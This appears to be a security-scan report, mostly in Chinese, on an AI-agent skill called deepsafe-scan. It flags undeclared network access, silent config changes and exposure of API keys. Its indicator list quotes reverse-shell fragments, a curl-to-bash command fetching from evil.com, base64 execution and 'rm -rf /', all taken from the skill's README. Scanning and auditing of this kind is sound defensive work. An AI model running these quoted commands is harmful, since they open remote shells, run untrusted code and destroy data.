安全决策报告

deepsafe-scan

Name: deepsafe-scan 可信度判断报告
Item: deepsafe-scan
Rating: 32
Author: ClawSafe

DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.

安装决策优先来源: 手动上传扫描时间: 2026/4/4

文件 19

IOC 15

越权项 2

发现 5

最直接的威胁证据

Skill installed via legitimate OpenClaw marketplace 初始入口 · SKILL.md

Scanner reads user's openclaw.json config recon · scripts/scan.py

Auto-modifies openclaw.json to enable chatCompletions endpoint 权限提升 · scripts/llm_client.py

为什么得出这个结论

3/4 个维度触发

阻止

声明与实际能力

发现 2 项声明之外的能力或越权行为。

阻止

隐藏执行与外联

提取到 5 个高危 IOC 或外联信号。

阻止

攻击链与高危发现

报告包含 5 步攻击链，另有 2 项高危或严重发现。

通过

依赖与供应链卫生

依赖结构存在，但暂未看到明显高危告警。

攻击链

Skill installed via legitimate OpenClaw marketplace

初始入口 · SKILL.md:1

Scanner reads user's openclaw.json config

recon · scripts/scan.py:1

Auto-modifies openclaw.json to enable chatCompletions endpoint

权限提升 · scripts/llm_client.py:213

Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment

权限提升 · scripts/llm_client.py:124

API key passed to subprocess as argv, visible in process listing

exposure · scripts/scan.py:88

风险分是怎么被拉高的

Undeclared network access +25

SKILL.md declares Bash/Read only but subprocess probes make HTTP requests to LLM APIs

Silent config modification +25

_ensure_chat_completions_enabled() auto-modifies openclaw.json without user consent

Credential auto-detection +10

Reads ANTHROPIC_API_KEY/OPENAI_API_KEY from environment - declared purpose but invasive

Subprocess with API keys +8

Probes receive api-key as command-line argument, exposing in process listing

最关键的证据

高危文档欺骗

Network access not declared in SKILL.md

The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.

scripts/llm_client.py:1

Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations

高危权限提升

Auto-modifies openclaw.json without user consent

The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.

scripts/llm_client.py:213

Remove auto-modification or prompt user explicitly before making config changes

中危凭证窃取

API credentials passed as command-line arguments

Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.

scripts/scan.py:88

Use environment variables or file-based credential passing instead of argv

中危敏感访问

Auto-detection of API credentials from multiple sources

The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.

scripts/llm_client.py:124

Document this behavior clearly and provide --no-llm option to disable credential detection

低危文档欺骗

README.md contains example malicious patterns

The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.

README.md:155

Move these examples to a separate 'threat-patterns' reference document to avoid confusion

声明能力 vs 实际能力

文件系统 通过

声明 READ

→

推断 READ

SKILL.md: allowed-tools includes Read

命令执行 通过

声明 WRITE

→

推断 WRITE

SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)

网络访问 阻止

声明 NONE

→

推断 READ

scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py: direct API calls

环境变量 阻止

声明 NONE

→

推断 READ

llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN

可疑产物与外联

严重危险命令

bash -i >&

README.md:155

严重危险命令

/dev/tcp/

README.md:155

严重危险命令

curl https://evil.com/x.sh \| bash

README.md:156

严重编码执行

base64 -d

README.md:159

严重危险命令

rm -rf /

README.md:161

中危外部 URL

https://img.shields.io/badge/python-3.9%2B-blue.svg

README.md:5

中危外部 URL

https://python.org

README.md:5

中危外部 URL

https://img.shields.io/badge/deps-zero-green.svg

README.md:6

中危外部 URL

https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg

README.md:7

中危外部 URL

https://evil.com/x.sh

README.md:156

中危外部 URL

https://healthcheck.dev-tools.sh/ping

demo/awesome-ai-rules/AGENTS.md:19

中危外部 URL

https://api.analytics-cdn.dev/v1/event

demo/awesome-ai-rules/CLAUDE.md:15

依赖与供应链

包名	版本	来源	漏洞	备注
urllib (stdlib)	`N/A`	python3 built-in	否	Zero external dependencies

文件构成

19 个文件 · 5683 行

Python 6 个文件 · 3481 行Markdown 8 个文件 · 1232 行JSON 4 个文件 · 967 行Text 1 个文件 · 3 行

需关注文件 · 4

scripts/scan.py Python · 1547 行

API credentials passed as command-line arguments · https://hooks\.slack\.com/services/T[A-Z0-9

scripts/probes/persuasion_probe.py Python · 475 行

http://127.0.0.1:11434/v1

README.md Markdown · 255 行

README.md contains example malicious patterns · bash -i >& · /dev/tcp/ · curl https://evil.com/x.sh \| bash · base64 -d · rm -rf / · https://img.shields.io/badge/python-3.9%2B-blue.svg · https://python.org · https://img.shields.io/badge/deps-zero-green.svg · https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg · https://evil.com/x.sh · [email protected]

scripts/llm_client.py Python · 234 行

Network access not declared in SKILL.md · Auto-modifies openclaw.json without user consent · Auto-detection of API credentials from multiple sources

其他文件 · halueval_samples.json · plan-cross-platform-evolution.md · deception_probe.py · sandbagging_probe.py · halueval_probe.py · SKILL.md +2

19 文件 · 264.4 KB · 5683 行

Python 6f · 3481LMarkdown 8f · 1232LJSON 4f · 967LText 1f · 3L

├─ ▾ 📁 data

│ ├─ 📋 halueval_samples.json JSON 901L · 65.9 KB

│ ├─ 📋 manipulation_persuasion_topics.json JSON 40L · 981 B

│ ├─ 📋 prompts.json JSON 21L · 5.0 KB

│ └─ 📄 qa_evaluation_instruction.txt Text 3L · 224 B

├─ ▾ 📁 demo

│ └─ ▾ 📁 awesome-ai-rules

│ ├─ 📝 AGENTS.md Markdown 24L · 473 B

│ ├─ 📝 CLAUDE.md Markdown 26L · 627 B

│ └─ 📝 README.md Markdown 26L · 681 B

├─ ▾ 📁 docs

│ └─ 📝 plan-cross-platform-evolution.md Markdown 615L · 22.6 KB

├─ ▾ 📁 scripts

│ ├─ ▾ 📁 probes

│ │ ├─ 🐍 deception_probe.py Python 483L · 19.5 KB

│ │ ├─ 🐍 halueval_probe.py Python 327L · 11.4 KB

│ │ ├─ 🐍 persuasion_probe.py Python 475L · 17.8 KB

│ │ └─ 🐍 sandbagging_probe.py Python 415L · 14.3 KB

│ ├─ 🐍 llm_client.py Python 234L · 8.7 KB

│ └─ 🐍 scan.py Python 1547L · 75.9 KB

├─ 📝 AGENTS.md Markdown 75L · 2.5 KB

├─ 📝 CLAUDE.md Markdown 79L · 2.5 KB

├─ 📝 README.md Markdown 255L · 9.3 KB

├─ 📝 SKILL.md Markdown 132L · 5.9 KB

└─ 📋 _meta.json JSON 5L · 132 B

安全亮点

Uses only Python stdlib (no external dependencies) - reduces supply chain risk

Skips LLM features gracefully when no API credentials found (--no-llm flag works)

Legitimate security scanning tool with documented purpose

Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission

Open source with transparent implementation